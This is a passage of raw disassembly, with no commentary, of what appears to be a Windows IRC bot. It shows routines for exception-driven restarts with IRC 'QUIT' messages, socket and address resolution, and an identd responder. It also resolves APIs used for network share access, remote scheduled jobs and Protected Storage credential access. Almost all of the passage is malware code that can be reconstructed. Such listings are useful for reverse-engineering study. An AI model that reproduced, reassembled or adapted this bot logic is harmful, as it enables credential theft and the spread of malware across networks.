jnz short loc_402924
mov edi, offset aException_stac ; "EXCEPTION_STACK_OVERFLOW"
jmp short loc_402924
; ---------------------------------------------------------------------------
loc_402918: ; CODE XREF: sub_40287C+8B�j
mov edi, offset aException_int_ ; "EXCEPTION_INT_DIVIDE_BY_ZERO"
jmp short loc_402924
; ---------------------------------------------------------------------------
loc_40291F: ; CODE XREF: sub_40287C+83�j
mov edi, offset aException_flt ; "EXCEPTION_FLT"
loc_402924: ; CODE XREF: sub_40287C+57�j
; sub_40287C+5E�j ...
cmp dword ptr [edx+4], 1
mov edx, offset aRestarting ; "Restarting"
jz short loc_402934
mov edx, offset aContinuing ; "Continuing"
loc_402934: ; CODE XREF: sub_40287C+B1�j
mov eax, [esi+4]
push edx
push edi
push ecx
push dword ptr [eax+0C0h]
push dword ptr [eax+0B8h]
push dword ptr [eax+0C4h]
push dword ptr [eax+0B4h]
push dword ptr [eax+9Ch]
push dword ptr [eax+0A0h]
push dword ptr [eax+0A8h]
push dword ptr [eax+0ACh]
push dword ptr [eax+0A4h]
push dword ptr [eax+0B0h]
lea eax, [ebx+1]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push offset dword_41264C
push offset dword_4177EC
call sub_408CDE
add esp, 48h
xor edi, edi
loc_402994: ; CODE XREF: sub_40287C+27�j
inc ebx
cmp ebx, 64h
jz short loc_4029C0
mov eax, [esi]
cmp dword ptr [eax+4], 1
jz short loc_4029C0
cmp dword ptr [eax], 80000003h
jnz short loc_4029BB
mov esi, [esi+4]
inc dword ptr [esi+0B8h]
or eax, 0FFFFFFFFh
loc_4029B6: ; CODE XREF: sub_40287C+142�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4029BB: ; CODE XREF: sub_40287C+12C�j
push 1
pop eax
jmp short loc_4029B6
; ---------------------------------------------------------------------------
loc_4029C0: ; CODE XREF: sub_40287C+11C�j
; sub_40287C+124�j
lea eax, [ebp+var_104]
push 104h
push eax
push edi
call ds:dword_411094 ; GetModuleHandleA
push eax
call ds:dword_411098 ; GetModuleFileNameA
test eax, eax
jz short loc_402A00
push edi
push edi
lea eax, [ebp+var_104]
push edi
push eax
push offset aOpen ; "open"
push edi
call ds:dword_4111E4
cmp eax, 20h
ja short loc_402A00
push offset aQuitExitting ; "QUIT :exitting"
jmp short loc_402A05
; ---------------------------------------------------------------------------
loc_402A00: ; CODE XREF: sub_40287C+160�j
; sub_40287C+17B�j
push offset aQuitRestarting ; "QUIT :restarting"
loc_402A05: ; CODE XREF: sub_40287C+182�j
call sub_408E60
pop ecx
push edi
call ds:dword_411064 ; ExitProcess
sub_40287C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A12 proc near ; DATA XREF: sub_402D7B:loc_402EAC�o
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
xor ebx, ebx
cmp edi, ebx
jz short loc_402A57
mov eax, [edi+4]
cmp eax, ebx
jz short loc_402A37
cmp eax, 2
jz short loc_402A37
mov esi, 273Fh
jmp short loc_402A49
; ---------------------------------------------------------------------------
loc_402A37: ; CODE XREF: sub_402A12+17�j
; sub_402A12+1C�j
mov eax, [edi+8]
cmp eax, 1
jz short loc_402A57
cmp eax, 2
jz short loc_402A57
mov esi, 273Ch
loc_402A49: ; CODE XREF: sub_402A12+23�j
push esi
call ds:dword_411244 ; WSASetLastError
mov eax, esi
jmp loc_402C0A
; ---------------------------------------------------------------------------
loc_402A57: ; CODE XREF: sub_402A12+10�j
; sub_402A12+2B�j ...
cmp [ebp+arg_0], ebx
jnz loc_402AF7
push 30h
call sub_41082C ; malloc
mov esi, eax
pop ecx
cmp esi, ebx
jz loc_402B3E
push 30h
push ebx
push esi
call sub_410850 ; memset
push 10h
lea eax, [ebp+var_18]
pop ebx
push ebx
push 0
push eax
call sub_410850 ; memset
add esp, 18h
cmp [ebp+arg_4], 0
mov [ebp+var_18], 2
jz short loc_402AAD
push [ebp+arg_4]
call sub_41088C ; atoi
pop ecx
push eax
call ds:dword_411248 ; htons
mov [ebp+var_16], ax
loc_402AAD: ; CODE XREF: sub_402A12+85�j
test edi, edi
mov dword ptr [esi+4], 2
jz short loc_402ABD
mov eax, [edi+8]
jmp short loc_402AC0
; ---------------------------------------------------------------------------
loc_402ABD: ; CODE XREF: sub_402A12+A4�j
push 1
pop eax
loc_402AC0: ; CODE XREF: sub_402A12+A9�j
test edi, edi
mov [esi+8], eax
jz short loc_402ACC
mov eax, [edi+0Ch]
jmp short loc_402ACF
; ---------------------------------------------------------------------------
loc_402ACC: ; CODE XREF: sub_402A12+B3�j
push 6
pop eax
loc_402ACF: ; CODE XREF: sub_402A12+B8�j
mov [esi+0Ch], eax
lea ecx, [ebp+var_18]
lea eax, [esi+20h]
push ebx
push ecx
mov [esi+10h], ebx
mov [esi+18h], eax
and [ebp+var_14], 0
push eax
call sub_410838 ; memcpy
mov eax, [ebp+arg_C]
add esp, 0Ch
mov [eax], esi
jmp loc_402C08
; ---------------------------------------------------------------------------
loc_402AF7: ; CODE XREF: sub_402A12+48�j
push [ebp+arg_0]
call ds:dword_41124C ; gethostbyname
cmp eax, ebx
mov [ebp+var_8], eax
jz short loc_402B20
mov eax, [eax+0Ch]
xor edi, edi
mov [ebp+arg_0], edi
loc_402B0F: ; CODE XREF: sub_402A12+105�j
cmp [eax], ebx
jz short loc_402B19
inc edi
add eax, 4
jmp short loc_402B0F
; ---------------------------------------------------------------------------
loc_402B19: ; CODE XREF: sub_402A12+FF�j
cmp edi, ebx
mov [ebp+arg_0], edi
jnz short loc_402B2A
loc_402B20: ; CODE XREF: sub_402A12+F3�j
mov eax, 2AFBh
jmp loc_402C0A
; ---------------------------------------------------------------------------
loc_402B2A: ; CODE XREF: sub_402A12+10C�j
lea esi, [edi+edi*2]
shl esi, 4
push esi
call sub_41082C ; malloc
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jnz short loc_402B4E
loc_402B3E: ; CODE XREF: sub_402A12+5A�j
push 8
call ds:dword_411244 ; WSASetLastError
push 8
pop eax
jmp loc_402C0A
; ---------------------------------------------------------------------------
loc_402B4E: ; CODE XREF: sub_402A12+12A�j
push esi
push ebx
push eax
call sub_410850 ; memset
push 10h
lea eax, [ebp+var_28]
push ebx
push eax
call sub_410850 ; memset
add esp, 18h
cmp [ebp+arg_4], ebx
mov [ebp+var_28], 2
jz short loc_402B84
push [ebp+arg_4]
call sub_41088C ; atoi
pop ecx
push eax
call ds:dword_411248 ; htons
mov [ebp+var_26], ax
loc_402B84: ; CODE XREF: sub_402A12+15C�j
test edi, edi
jbe short loc_402C00
mov eax, [ebp+var_4]
lea esi, [eax+8]
loc_402B8E: ; CODE XREF: sub_402A12+1EC�j
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_402B99
mov eax, [eax]
jmp short loc_402B9C
; ---------------------------------------------------------------------------
loc_402B99: ; CODE XREF: sub_402A12+181�j
push 4
pop eax
loc_402B9C: ; CODE XREF: sub_402A12+185�j
mov ecx, [ebp+arg_8]
lea edi, [esi-8]
test ecx, ecx
mov [edi], eax
mov dword ptr [esi-4], 2
jz short loc_402BB4
mov eax, [ecx+8]
jmp short loc_402BB7
; ---------------------------------------------------------------------------
loc_402BB4: ; CODE XREF: sub_402A12+19B�j
push 1
pop eax
loc_402BB7: ; CODE XREF: sub_402A12+1A0�j
test ecx, ecx
mov [esi], eax
jz short loc_402BC2
mov eax, [ecx+0Ch]
jmp short loc_402BC5
; ---------------------------------------------------------------------------
loc_402BC2: ; CODE XREF: sub_402A12+1A9�j
push 6
pop eax
loc_402BC5: ; CODE XREF: sub_402A12+1AE�j
mov edx, [ebp+var_8]
push 10h
mov [esi+4], eax
pop ecx
lea eax, [esi+18h]
mov [esi+8], ecx
mov [esi+10h], eax
mov edx, [edx+0Ch]
push ecx
lea ecx, [ebp+var_28]
mov edx, [edx+ebx*4]
push ecx
push eax
mov edx, [edx]
mov [ebp+var_24], edx
call sub_410838 ; memcpy
add esp, 0Ch
test ebx, ebx
jz short loc_402BF7
mov [esi-1Ch], edi
loc_402BF7: ; CODE XREF: sub_402A12+1E0�j
inc ebx
add esi, 30h
cmp ebx, [ebp+arg_0]
jb short loc_402B8E
loc_402C00: ; CODE XREF: sub_402A12+174�j
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_4]
mov [eax], ecx
loc_402C08: ; CODE XREF: sub_402A12+E0�j
xor eax, eax
loc_402C0A: ; CODE XREF: sub_402A12+40�j
; sub_402A12+113�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
sub_402A12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C11 proc near ; DATA XREF: sub_402D7B+13B�o
var_424 = byte ptr -424h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 424h
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_8], edi
jnz short loc_402C29
cmp [ebp+arg_10], edi
jz short loc_402C34
loc_402C29: ; CODE XREF: sub_402C11+11�j
mov ebx, [ebp+arg_18]
test ebx, 0FFFFFFE0h
jz short loc_402C3E
loc_402C34: ; CODE XREF: sub_402C11+16�j
mov esi, 2726h
jmp loc_402D2E
; ---------------------------------------------------------------------------
loc_402C3E: ; CODE XREF: sub_402C11+21�j
mov esi, [ebp+arg_0]
cmp word ptr [esi], 2
jz short loc_402C51
mov esi, 273Fh
jmp loc_402D2E
; ---------------------------------------------------------------------------
loc_402C51: ; CODE XREF: sub_402C11+34�j
cmp [ebp+arg_8], edi
jz loc_402CF4
push dword ptr [esi+4]
add esi, 4
call ds:dword_411230 ; inet_ntoa
cmp eax, edi
jnz short loc_402C72
or eax, 0FFFFFFFFh
jmp loc_402D60
; ---------------------------------------------------------------------------
loc_402C72: ; CODE XREF: sub_402C11+57�j
mov edi, 401h
push edi
push eax
lea eax, [ebp+var_424]
push eax
call sub_4052A6
add esp, 0Ch
test bl, 2
jnz short loc_402CE1
test bl, 4
jz short loc_402CC5
loc_402C92: ; CODE XREF: sub_402C11+C0�j
; sub_402C11+C6�j
push 0
push 4
push esi
call ds:dword_411234 ; gethostbyaddr
mov esi, eax
test esi, esi
jz short loc_402CD9
push dword ptr [esi]
call sub_410826 ; strlen
inc eax
pop ecx
cmp eax, [ebp+arg_C]
ja short loc_402D29
push edi
lea eax, [ebp+var_424]
push dword ptr [esi]
push eax
call sub_4052A6
add esp, 0Ch
jmp short loc_402CF4
; ---------------------------------------------------------------------------
loc_402CC5: ; CODE XREF: sub_402C11+7F�j
test bl, 1
jz short loc_402CE1
mov eax, [esi]
cmp eax, 7F000001h
jz short loc_402C92
test eax, eax
jnz short loc_402CE1
jmp short loc_402C92
; ---------------------------------------------------------------------------
loc_402CD9: ; CODE XREF: sub_402C11+90�j
call ds:dword_411238 ; WSAGetLastError
jmp short loc_402D60
; ---------------------------------------------------------------------------
loc_402CE1: ; CODE XREF: sub_402C11+7A�j
; sub_402C11+B7�j ...
lea eax, [ebp+var_424]
push eax
call sub_410826 ; strlen
inc eax
pop ecx
cmp eax, [ebp+arg_C]
ja short loc_402D29
loc_402CF4: ; CODE XREF: sub_402C11+43�j
; sub_402C11+B2�j
cmp [ebp+arg_10], 0
jz short loc_402D47
lea eax, [ebp+var_20]
push 0Ah
push eax
mov eax, [ebp+arg_0]
mov ax, [eax+2]
push eax
call ds:dword_411248 ; htons
movzx eax, ax
push eax
call sub_410C9A ; _itoa
lea eax, [ebp+var_20]
push eax
call sub_410826 ; strlen
add esp, 10h
inc eax
cmp eax, [ebp+arg_14]
jbe short loc_402D39
loc_402D29: ; CODE XREF: sub_402C11+9E�j
; sub_402C11+E1�j
mov esi, 2747h
loc_402D2E: ; CODE XREF: sub_402C11+28�j
; sub_402C11+3B�j
push esi
call ds:dword_411244 ; WSASetLastError
mov eax, esi
jmp short loc_402D60
; ---------------------------------------------------------------------------
loc_402D39: ; CODE XREF: sub_402C11+116�j
lea eax, [ebp+var_20]
push eax
push [ebp+arg_10]
call sub_410820 ; _mbscpy
pop ecx
pop ecx
loc_402D47: ; CODE XREF: sub_402C11+E7�j
cmp [ebp+arg_8], 0
jz short loc_402D5E
lea eax, [ebp+var_424]
push eax
push [ebp+arg_8]
call sub_410820 ; _mbscpy
pop ecx
pop ecx
loc_402D5E: ; CODE XREF: sub_402C11+13A�j
xor eax, eax
loc_402D60: ; CODE XREF: sub_402C11+5C�j
; sub_402C11+CE�j ...
pop edi
pop esi
pop ebx
leave
retn 1Ch
sub_402C11 endp
; =============== S U B R O U T I N E =======================================
sub_402D67 proc near ; DATA XREF: sub_402D7B+145�o
arg_0 = dword ptr 4
cmp [esp+arg_0], 0
jz short locret_402D78
push [esp+arg_0]
call sub_410832 ; free
pop ecx
locret_402D78: ; CODE XREF: sub_402D67+5�j
retn 4
sub_402D67 endp
; =============== S U B R O U T I N E =======================================
sub_402D7B proc near ; CODE XREF: seg000:00410607�p
push esi
push edi
mov edi, ds:dword_41105C
push offset aKernel32_dll ; "kernel32.dll"
call edi ; LoadLibraryA
mov esi, ds:dword_411060
test eax, eax
jz short loc_402DA1
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push eax
call esi ; GetProcAddress
mov dword_417B70, eax
loc_402DA1: ; CODE XREF: sub_402D7B+17�j
push ebx
push offset aNetapi32_dll ; "netapi32.dll"
call edi ; LoadLibraryA
mov ebx, eax
test ebx, ebx
jz short loc_402E24
push offset aNetusegetinfo ; "NetUseGetInfo"
push ebx
call esi ; GetProcAddress
push offset aNetuseadd ; "NetUseAdd"
push ebx
mov dword_417B78, eax
call esi ; GetProcAddress
push offset aNetusedel ; "NetUseDel"
push ebx
mov dword_417B7C, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push ebx
mov dword_417B80, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push ebx
mov dword_417B84, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push ebx
mov dword_417B88, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push ebx
mov dword_417B8C, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push ebx
mov dword_417B90, eax
call esi ; GetProcAddress
push offset aNetaddalternat ; "NetAddAlternateComputerName"
push ebx
mov dword_417B94, eax
call esi ; GetProcAddress
mov dword_417B98, eax
loc_402E24: ; CODE XREF: sub_402D7B+32�j
push offset aMpr_dll ; "mpr.dll"
call edi ; LoadLibraryA
mov ebx, eax
test ebx, ebx
jz short loc_402E65
push offset aWnetaddconnect ; "WNetAddConnection2A"
push ebx
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push ebx
mov dword_417B9C, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push ebx
mov dword_417BA0, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push ebx
mov dword_417BA4, eax
call esi ; GetProcAddress
mov dword_417BA8, eax
loc_402E65: ; CODE XREF: sub_402D7B+B4�j
push offset aWs2_32_dll ; "ws2_32.dll"
call edi ; LoadLibraryA
mov ebx, eax
push offset aGetaddrinfo ; "getaddrinfo"
push ebx
call esi ; GetProcAddress
push offset aGetnameinfo ; "getnameinfo"
push ebx
mov dword_417BB4, eax
call esi ; GetProcAddress
push offset aFreeaddrinfo ; "freeaddrinfo"
push ebx
mov dword_417BB8, eax
call esi ; GetProcAddress
cmp dword_417BB4, 0
mov dword_417BBC, eax
pop ebx
jz short loc_402EAC
cmp dword_417BB8, 0
jz short loc_402EAC
test eax, eax
jnz short loc_402ECA
loc_402EAC: ; CODE XREF: sub_402D7B+122�j
; sub_402D7B+12B�j
mov dword_417BB4, offset sub_402A12
mov dword_417BB8, offset sub_402C11
mov dword_417BBC, offset sub_402D67
loc_402ECA: ; CODE XREF: sub_402D7B+12F�j
push offset aPstorec_dll ; "pstorec.dll"
call edi ; LoadLibraryA
test eax, eax
jz short loc_402EE2
push offset aPstorecreatein ; "PStoreCreateInstance"
push eax
call esi ; GetProcAddress
mov dword_417BB0, eax
loc_402EE2: ; CODE XREF: sub_402D7B+158�j
push offset aWininet_dll ; "wininet.dll"
call edi ; LoadLibraryA
test eax, eax
jz short loc_402EFA
push offset aInternetgetcon ; "InternetGetConnectedStateExA"
push eax
call esi ; GetProcAddress
mov dword_417BAC, eax
loc_402EFA: ; CODE XREF: sub_402D7B+170�j
pop edi
pop esi
retn
sub_402D7B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402EFD proc near ; DATA XREF: sub_4030A7+65�o
var_121C = byte ptr -121Ch
var_21C = dword ptr -21Ch
var_218 = byte ptr -218h
var_212 = byte ptr -212h
var_6C = byte ptr -6Ch
var_48 = byte ptr -48h
var_24 = byte ptr -24h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 121Ch
call sub_4108B0
push ebx
push 1ADh
push [ebp+arg_0]
lea eax, [ebp+var_21C]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
lea eax, [ebp+var_218]
push 1
push eax
call sub_4035FB
mov ebx, eax
add esp, 18h
test ebx, ebx
jnz short loc_402F51
push [ebp+var_21C]
call sub_406753
pop ecx
xor eax, eax
jmp loc_4030A2
; ---------------------------------------------------------------------------
loc_402F51: ; CODE XREF: sub_402EFD+3F�j
push esi
lea eax, [ebp+var_218]
push edi
push eax
mov eax, [ebp+var_21C]
push dword ptr [eax]
lea eax, [ebp+var_212]
push offset dword_4129C0
push eax
call sub_408D50
mov esi, 3E8h
push esi
push ebx
call sub_40371E
add esp, 18h
loc_402F82: ; CODE XREF: sub_402EFD+189�j
mov edi, eax
mov eax, [ebp+var_21C]
cmp dword ptr [eax+4], 0
jnz loc_40308B
test edi, edi
jz loc_40308B
cmp edi, 0FFFFFFFFh
jz loc_40307D
lea eax, [ebp+var_121C]
push 1000h
push eax
push edi
call sub_403D69
add esp, 0Ch
test eax, eax
jz loc_403076
cmp eax, 0FFFFFFFFh
jz loc_403076
lea eax, [ebp+var_121C]
push eax
call sub_410826 ; strlen
cmp eax, 10h
pop ecx
ja loc_403076
cmp byte_418BF8, 0
jz short loc_402FFC
lea eax, [ebp+var_24]
push offset byte_418BF8
push eax
call sub_410820 ; _mbscpy
pop ecx
pop ecx
jmp short loc_40301E
; ---------------------------------------------------------------------------
loc_402FFC: ; CODE XREF: sub_402EFD+EB�j
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_48]
push eax
call sub_404354
lea eax, [ebp+var_24]
push eax
push offset byte_418BF8
call sub_410820 ; _mbscpy
add esp, 14h
loc_40301E: ; CODE XREF: sub_402EFD+FD�j
lea eax, [ebp+var_121C]
push offset aUseridUnix ; " : USERID : UNIX : "
push eax
call sub_410856 ; _mbscat
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_121C]
push eax
call sub_410856 ; _mbscat
lea eax, [ebp+var_121C]
push offset asc_412214 ; "\r\n"
push eax
call sub_410856 ; _mbscat
lea eax, [ebp+var_121C]
push eax
call sub_410826 ; strlen
inc eax
push eax
lea eax, [ebp+var_121C]
push eax
push edi
call sub_403D54
push edi
call sub_403D27
add esp, 2Ch
jmp short loc_40307D
; ---------------------------------------------------------------------------
loc_403076: ; CODE XREF: sub_402EFD+BF�j
; sub_402EFD+C8�j ...
push edi
call sub_403D27
pop ecx
loc_40307D: ; CODE XREF: sub_402EFD+A2�j
; sub_402EFD+177�j
push esi
push ebx
call sub_40371E
pop ecx
pop ecx
jmp loc_402F82
; ---------------------------------------------------------------------------
loc_40308B: ; CODE XREF: sub_402EFD+91�j
; sub_402EFD+99�j
push ebx
call sub_4038E1
push [ebp+var_21C]
call sub_406753
pop ecx
xor eax, eax
pop ecx
pop edi
pop esi
loc_4030A2: ; CODE XREF: sub_402EFD+4F�j
pop ebx
leave
retn 4
sub_402EFD endp
; =============== S U B R O U T I N E =======================================
sub_4030A7 proc near ; CODE XREF: sub_40735A+6CF�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
test ebx, ebx
push esi
jz short loc_4030BC
push ebx
call sub_40325E
test eax, eax
pop ecx
jnz short loc_4030C1
loc_4030BC: ; CODE XREF: sub_4030A7+8�j
mov ebx, offset dword_412A14
loc_4030C1: ; CODE XREF: sub_4030A7+13�j
push 1ADh
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_40311A
push edi
push 6
lea eax, [esi+4]
push ebx
push eax
call sub_4052A6
mov edi, [esp+18h+arg_0]
lea eax, [esi+0Ah]
push edi
push eax
call sub_403E60
add esp, 14h
test edi, edi
jz short loc_403101
cmp byte ptr [edi+18Bh], 0
jz short loc_403101
xor eax, eax
jmp short loc_403104
; ---------------------------------------------------------------------------
loc_403101: ; CODE XREF: sub_4030A7+4B�j
; sub_4030A7+54�j
push 1
pop eax
loc_403104: ; CODE XREF: sub_4030A7+58�j
push ebx
push offset dword_4129F4
push eax
push esi
push offset sub_402EFD
call sub_40663C
add esp, 14h
pop edi
loc_40311A: ; CODE XREF: sub_4030A7+29�j
pop esi
pop ebx
retn
sub_4030A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40311D proc near ; CODE XREF: sub_40B7A2+5E�p
; sub_40BE08+133�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 104h
push esi
mov esi, 104h
push [ebp+arg_0]
lea eax, [ebp+var_104]
push offset dword_412A2C
push esi
push eax
call sub_41089E ; _snprintf
add esp, 10h
lea eax, [ebp+var_104]
push esi
push [ebp+arg_4]
push 0FFFFFFFFh
push eax
push 0
push 0
call ds:dword_411058 ; MultiByteToWideChar
pop esi
leave
retn
sub_40311D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40315E proc near ; CODE XREF: sub_40735A+D2C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
dec eax
push esi
dec eax
push edi
mov ebx, 0FEh
jz short loc_4031A7
dec eax
jz short loc_40318B
dec eax
jnz short loc_4031C3
push ebx
push 1
call sub_40AADE
mov edi, eax
mov eax, [ebp+arg_0]
pop ecx
and al, 0
pop ecx
or edi, eax
jmp short loc_40318E
; ---------------------------------------------------------------------------
loc_40318B: ; CODE XREF: sub_40315E+13�j
mov edi, [ebp+arg_0]
loc_40318E: ; CODE XREF: sub_40315E+2B�j
push ebx
push 1
call sub_40AADE
mov esi, eax
pop ecx
shl esi, 8
and edi, 0FFFF00FFh
pop ecx
or esi, edi
jmp short loc_4031AA
; ---------------------------------------------------------------------------
loc_4031A7: ; CODE XREF: sub_40315E+10�j
mov esi, [ebp+arg_0]
loc_4031AA: ; CODE XREF: sub_40315E+47�j
push ebx
push 1
call sub_40AADE
mov edi, eax
pop ecx
shl edi, 10h
and esi, 0FF00FFFFh
pop ecx
or edi, esi
jmp short loc_4031C6
; ---------------------------------------------------------------------------
loc_4031C3: ; CODE XREF: sub_40315E+16�j
mov edi, [ebp+arg_0]
loc_4031C6: ; CODE XREF: sub_40315E+63�j
push ebx
push 1
call sub_40AADE
pop ecx
and edi, 0FFFFFFh
shl eax, 18h
pop ecx
or eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40315E endp
; =============== S U B R O U T I N E =======================================
sub_4031E0 proc near ; CODE XREF: sub_403289+A�p
; sub_403342+13�p
arg_0 = dword ptr 4
push 0Ah
push [esp+4+arg_0]
push 0FFFFh
push 401h
call sub_40AADE
pop ecx
pop ecx
push eax
call sub_410C9A ; _itoa
add esp, 0Ch
retn
sub_4031E0 endp
; =============== S U B R O U T I N E =======================================
sub_403201 proc near ; CODE XREF: sub_408F9D+479�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 4
push offset dword_412A50
push esi
call sub_4108E0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_40321F
loc_40321A: ; CODE XREF: sub_403201+30�j
; sub_403201+44�j
push 1
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40321F: ; CODE XREF: sub_403201+17�j
push 4
push offset dword_412A48
push esi
call sub_4108E0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_40321A
push 8
push offset dword_412A3C
push esi
call sub_4108E0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_40321A
push 3
push offset dword_412A38
push esi
call sub_4108E0 ; strncmp
add esp, 0Ch
neg eax
sbb eax, eax
pop esi
inc eax
retn
sub_403201 endp
; =============== S U B R O U T I N E =======================================
sub_40325E proc near ; CODE XREF: sub_402230+173�p
; sub_4030A7+B�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor eax, eax
loc_403264: ; CODE XREF: sub_40325E+10�j
cmp byte ptr [eax+ecx], 0
jz short loc_403273
inc eax
cmp eax, 6
jnz short loc_403264
loc_403270: ; CODE XREF: sub_40325E+1E�j
; sub_40325E+25�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_403273: ; CODE XREF: sub_40325E+A�j
push ecx
call sub_41088C ; atoi
test eax, eax
pop ecx
jz short loc_403270
cmp eax, 0FFFFh
ja short loc_403270
push 1
pop eax
retn
sub_40325E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403289 proc near ; CODE XREF: sub_4032EF+9�p
; sub_405E4E:loc_405F7A�p ...
var_8 = byte ptr -8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push esi
push eax
call sub_4031E0
lea eax, [ebp+var_8]
push 1
push eax
call sub_4035FB
mov esi, eax
add esp, 0Ch
test esi, esi
jnz short loc_4032B1
push 1
pop eax
jmp short loc_4032E7
; ---------------------------------------------------------------------------
loc_4032B1: ; CODE XREF: sub_403289+21�j
push edi
push 0BB8h
lea eax, [ebp+var_8]
push 0
push eax
push offset dword_418C78
call sub_403BBB
push esi
mov edi, eax
call sub_4038E1
add esp, 14h
test edi, edi
jz short loc_4032EA
cmp edi, 0FFFFFFFFh
jz short loc_4032EA
push edi
xor esi, esi
call sub_403D49
pop ecx
loc_4032E4: ; CODE XREF: sub_403289+64�j
mov eax, esi
pop edi
loc_4032E7: ; CODE XREF: sub_403289+26�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_4032EA: ; CODE XREF: sub_403289+4B�j
; sub_403289+50�j
push 1
pop esi
jmp short loc_4032E4
sub_403289 endp
; =============== S U B R O U T I N E =======================================
sub_4032EF proc near ; CODE XREF: sub_40D1B3+1�p
; sub_40E18A+182�p ...
cmp dword_417FC4, 0
jnz short loc_403317
call sub_403289
push eax
push offset dword_417FC8
call sub_406B0B
push 1
push offset dword_417FC4
call sub_406B0B
add esp, 10h
loc_403317: ; CODE XREF: sub_4032EF+7�j
mov eax, dword_417FC8
retn
sub_4032EF endp
; =============== S U B R O U T I N E =======================================
sub_40331D proc near ; CODE XREF: sub_403342+6�p
; sub_4035FB+36�p
push esi
push 0
push 1
push 17h
call ds:dword_41122C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_403338
push esi
call sub_403D49
pop ecx
loc_403338: ; CODE XREF: sub_40331D+12�j
xor eax, eax
cmp esi, 0FFFFFFFFh
setnz al
pop esi
retn
sub_40331D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403342 proc near ; CODE XREF: sub_4058D7:loc_405A61�p
var_8 = byte ptr -8
push ebp
mov ebp, esp
push ecx
push ecx
push esi
call sub_40331D
test eax, eax
jz short loc_40336E
lea eax, [ebp+var_8]
push eax
call sub_4031E0
lea eax, [ebp+var_8]
push 1
push eax
call sub_4035FB
mov esi, eax
add esp, 0Ch
test esi, esi
jnz short loc_403372
loc_40336E: ; CODE XREF: sub_403342+D�j
xor eax, eax
jmp short loc_4033A9
; ---------------------------------------------------------------------------
loc_403372: ; CODE XREF: sub_403342+2A�j
push edi
push 0BB8h
lea eax, [ebp+var_8]
push 2
push eax
push offset dword_412A64
call sub_403BBB
push esi
mov edi, eax
call sub_4038E1
add esp, 14h
test edi, edi
jz short loc_4033AC
cmp edi, 0FFFFFFFFh
jz short loc_4033AC
push 1
pop esi
push edi
call sub_403D49
pop ecx
loc_4033A6: ; CODE XREF: sub_403342+6C�j
mov eax, esi
pop edi
loc_4033A9: ; CODE XREF: sub_403342+2E�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_4033AC: ; CODE XREF: sub_403342+53�j
; sub_403342+58�j
xor esi, esi
jmp short loc_4033A6
sub_403342 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033B0 proc near ; CODE XREF: sub_405E4E:loc_405F61�p
; sub_40849F+196�p ...
var_14 = byte ptr -14h
push ebp
mov ebp, esp
sub esp, 14h
push esi
lea eax, [ebp+var_14]
push offset dword_412A18
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_14]
push eax
call sub_40AC4E
push 7D0h
push 2
lea eax, [ebp+var_14]
